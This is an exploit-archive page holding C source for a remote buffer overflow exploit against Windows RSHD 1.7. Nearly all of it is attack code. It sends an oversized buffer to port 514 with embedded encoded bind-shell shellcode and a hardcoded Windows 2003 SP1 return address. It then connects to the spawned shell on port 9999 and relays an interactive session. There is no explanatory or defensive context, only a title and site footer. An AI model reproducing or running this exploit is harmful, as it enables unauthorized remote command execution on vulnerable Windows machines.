Remote buffer overflow exploit for Windows RSHD version 1.7.
9110674c952064aafb14be264c6e9c8ddc58a09e7d4f6cae51810f67bd0c6415#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
#define ESIZ 1 + 1 + 1 + 1 + 1 + 1028
int
main (int argc, char *argv[])
{
unsigned char win32_bindshell[] = // 9999 tcp
"AAAAAAAAAAAAA"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x37\x5a\x6a\x66"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x76\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x79\x79\x4b\x4c\x32"
"\x4a\x7a\x4b\x42\x6d\x78\x68\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f\x75"
"\x30\x6e\x6b\x42\x4c\x45\x74\x71\x34\x6c\x4b\x41\x55\x57\x4c\x4e"
"\x6b\x33\x4c\x53\x35\x51\x68\x55\x51\x68\x6f\x4c\x4b\x72\x6f\x56"
"\x78\x6e\x6b\x61\x4f\x77\x50\x76\x61\x38\x6b\x52\x69\x4e\x6b\x36"
"\x54\x4e\x6b\x67\x71\x4a\x4e\x76\x51\x4f\x30\x6d\x49\x4e\x4c\x4d"
"\x54\x4b\x70\x41\x64\x43\x37\x4b\x71\x6b\x7a\x76\x6d\x54\x41\x4f"
"\x32\x7a\x4b\x6a\x54\x45\x6b\x33\x64\x56\x44\x77\x58\x34\x35\x6b"
"\x55\x4c\x4b\x61\x4f\x46\x44\x55\x51\x58\x6b\x31\x76\x6c\x4b\x46"
"\x6c\x30\x4b\x4e\x6b\x61\x4f\x75\x4c\x64\x41\x38\x6b\x53\x33\x54"
"\x6c\x4c\x4b\x6d\x59\x50\x6c\x64\x64\x55\x4c\x30\x61\x6b\x73\x74"
"\x71\x4b\x6b\x51\x74\x4c\x4b\x51\x53\x70\x30\x4c\x4b\x77\x30\x36"
"\x6c\x4c\x4b\x72\x50\x35\x4c\x4e\x4d\x6c\x4b\x73\x70\x57\x78\x31"
"\x4e\x42\x48\x4e\x6e\x50\x4e\x76\x6e\x5a\x4c\x30\x50\x6b\x4f\x49"
"\x46\x75\x36\x56\x33\x53\x56\x75\x38\x37\x43\x34\x72\x35\x38\x74"
"\x37\x54\x33\x44\x72\x63\x6f\x71\x44\x4b\x4f\x7a\x70\x42\x48\x38"
"\x4b\x38\x6d\x6b\x4c\x47\x4b\x30\x50\x4b\x4f\x4e\x36\x51\x4f\x4f"
"\x79\x4d\x35\x42\x46\x4b\x31\x7a\x4d\x33\x38\x57\x72\x76\x35\x61"
"\x7a\x46\x62\x4b\x4f\x6e\x30\x51\x78\x4b\x69\x67\x79\x59\x65\x6c"
"\x6d\x41\x47\x4b\x4f\x6e\x36\x41\x43\x56\x33\x76\x33\x52\x73\x70"
"\x53\x51\x53\x70\x53\x32\x63\x32\x73\x6b\x4f\x4e\x30\x41\x76\x62"
"\x48\x36\x47\x54\x4f\x41\x76\x72\x73\x4f\x79\x49\x71\x4e\x75\x31"
"\x78\x6e\x44\x67\x6a\x64\x30\x4f\x37\x70\x57\x69\x6f\x6e\x36\x70"
"\x6a\x74\x50\x62\x71\x73\x65\x4b\x4f\x38\x50\x62\x48\x4c\x64\x4e"
"\x4d\x64\x6e\x58\x69\x62\x77\x4b\x4f\x7a\x76\x50\x53\x51\x45\x39"
"\x6f\x58\x50\x71\x78\x6b\x55\x53\x79\x6f\x76\x53\x79\x36\x37\x39"
"\x6f\x79\x46\x72\x70\x61\x44\x33\x64\x62\x75\x59\x6f\x48\x50\x4a"
"\x33\x51\x78\x6d\x37\x71\x69\x79\x56\x71\x69\x70\x57\x6b\x4f\x6e"
"\x36\x51\x45\x69\x6f\x6e\x30\x45\x36\x63\x5a\x41\x74\x35\x36\x72"
"\x48\x30\x63\x50\x6d\x6f\x79\x59\x75\x63\x5a\x52\x70\x43\x69\x37"
"\x59\x58\x4c\x4f\x79\x79\x77\x52\x4a\x33\x74\x4d\x59\x39\x72\x55"
"\x61\x4f\x30\x7a\x53\x6d\x7a\x79\x6e\x47\x32\x76\x4d\x69\x6e\x47"
"\x32\x34\x6c\x6d\x43\x6c\x4d\x72\x5a\x54\x78\x4e\x4b\x4c\x6b\x6c"
"\x6b\x75\x38\x52\x52\x4b\x4e\x4e\x53\x55\x46\x79\x6f\x71\x65\x41"
"\x54\x59\x6f\x4e\x36\x43\x6b\x71\x47\x51\x42\x52\x71\x62\x71\x52"
"\x71\x51\x7a\x33\x31\x56\x31\x46\x31\x51\x45\x50\x51\x59\x6f\x4e"
"\x30\x50\x68\x4c\x6d\x6e\x39\x53\x35\x6a\x6e\x62\x73\x49\x6f\x5a"
"\x76\x50\x6a\x59\x6f\x4b\x4f\x34\x77\x59\x6f\x5a\x70\x6c\x4b\x32"
"\x77\x39\x6c\x6c\x43\x4b\x74\x61\x74\x6b\x4f\x6a\x76\x50\x52\x79"
"\x6f\x6e\x30\x42\x48\x7a\x4f\x6a\x6e\x59\x70\x63\x50\x42\x73\x4b"
"\x4f\x48\x56\x79\x6f\x4e\x30\x66";
char *buf;
int *ptr;
int i, c, sck;
struct sockaddr_in address;
struct hostent *hp;
if (argc < 2)
{
printf ("usage: %s address\n", argv[0]);
exit (-1);
}
// lsd-pl arrayd.c
sck = socket (AF_INET, SOCK_STREAM, 0);
bzero (&address, sizeof (address));
address.sin_family = AF_INET;
address.sin_port = htons (514);
if (0 !=
bind (sck, (struct sockaddr *) &address, sizeof (struct sockaddr_in)))
{
perror ("bind");
exit (-344);
}
if ((address.sin_addr.s_addr = inet_addr (argv[1])) == -1)
{
if ((hp = gethostbyname (argv[1])) == NULL)
{
errno = EADDRNOTAVAIL;
perror ("error");
exit (-1);
}
memcpy (&address.sin_addr.s_addr, hp->h_addr, 4);
}
if (connect (sck, (struct sockaddr *) &address, sizeof (address)) < 0)
{
perror ("error");
exit (-1);
}
buf = malloc (ESIZ);
memcpy (buf, "\x00\x41\x00\x41\x00", 5);
memset (buf + 5, 0x41, 1028);
memcpy (buf + 5, win32_bindshell, sizeof (win32_bindshell) - 1);
ptr = (int *) (buf + 5 + 1024);
*ptr = 0x71ae36b7; // call esi in wshtcpip in win2k3 SP1
write (sck, buf, ESIZ);
close (sck);
sleep (1);
sck = socket (AF_INET, SOCK_STREAM, 0);
bzero (&address, sizeof (address));
address.sin_family = AF_INET;
address.sin_port = htons (9999);
if ((address.sin_addr.s_addr = inet_addr (argv[1])) == -1)
{
if ((hp = gethostbyname (argv[1])) == NULL)
{
errno = EADDRNOTAVAIL;
perror ("error");
exit (-1);
}
memcpy (&address.sin_addr.s_addr, hp->h_addr, 4);
}
if (connect (sck, (struct sockaddr *) &address, sizeof (address)) < 0)
{
perror ("error");
exit (-1);
}
do_shell (sck);
}
// cvs_linux_freebsd_HEAP.c
int
do_shell (int sockfd)
{
while (1)
{
fd_set fds;
FD_ZERO (&fds);
FD_SET (0, &fds);
FD_SET (sockfd, &fds);
if (select (FD_SETSIZE, &fds, NULL, NULL, NULL))
{
int cnt;
char buf[1024];
if (FD_ISSET (0, &fds))
{
if ((cnt = read (0, buf, 1024)) < 1)
{
if (errno == EWOULDBLOCK || errno == EAGAIN)
continue;
else
break;
}
write (sockfd, buf, cnt);
}
if (FD_ISSET (sockfd, &fds))
{
if ((cnt = read (sockfd, buf, 1024)) < 1)
{
if (errno == EWOULDBLOCK || errno == EAGAIN)
continue;
else
break;
}
write (1, buf, cnt);
}
}
}
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed